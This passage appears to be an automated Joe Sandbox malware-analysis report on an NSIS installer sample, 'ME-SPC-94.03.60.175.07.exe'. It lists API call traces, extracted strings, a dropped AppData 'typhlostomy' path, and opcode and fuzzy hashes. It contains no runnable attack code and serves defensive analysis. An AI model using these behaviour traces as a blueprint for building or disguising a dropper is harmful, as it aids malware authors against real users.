                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-3452187874
                                                  • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                  • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                  • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                  • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                                  Control-flow Graph
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 004057F9
                                                  • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 00405841
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 00405864
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 0040586A
                                                  • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 0040587A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                  • FindClose.KERNEL32(00000000), ref: 00405929
                                                  Strings
                                                  • "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe", xrefs: 004057D9
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057DE
                                                  • \*.*, xrefs: 0040583B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-506693701
                                                  • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                  • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                  • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                  • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E

                                                  Control-flow Graph
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231,?,?,00000031), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp$C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231$Call
                                                  • API String ID: 1941528284-1573357854
                                                  • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                  • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                  • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                  • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                  • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                  • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                  • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406296
                                                  • FindClose.KERNEL32(00000000), ref: 004062A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: 8WB
                                                  • API String ID: 2295610775-3088156181
                                                  • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                  • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                  • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                  • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID:
                                                  • API String ID: 310444273-0
                                                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                  APIs
                                                  • CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231, xrefs: 004020FB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231
                                                  • API String ID: 542301482-1862805445
                                                  • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                  • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                  • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                  • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54

                                                  Control-flow Graph
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                  • ShowWindow.USER32(?), ref: 00403D1B
                                                  • DestroyWindow.USER32 ref: 00403D2F
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                  • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                  • GetDlgItem.USER32(?,?), ref: 00403E35
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                  • EnableWindow.USER32(?,?), ref: 00403F9E
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                  • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                  • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: &B
                                                  • API String ID: 3282139019-3208460036
                                                  • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                  • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                  • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                  • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 004039A0
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A20
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                  • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                  • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                  • API String ID: 914957316-433754792
                                                  • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                  • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                  • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                  • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                  Control-flow Graph

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,00000400), ref: 00402DEC
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00402E35
                                                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-909786098
                                                  • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                  • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                  • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                  • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                  • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
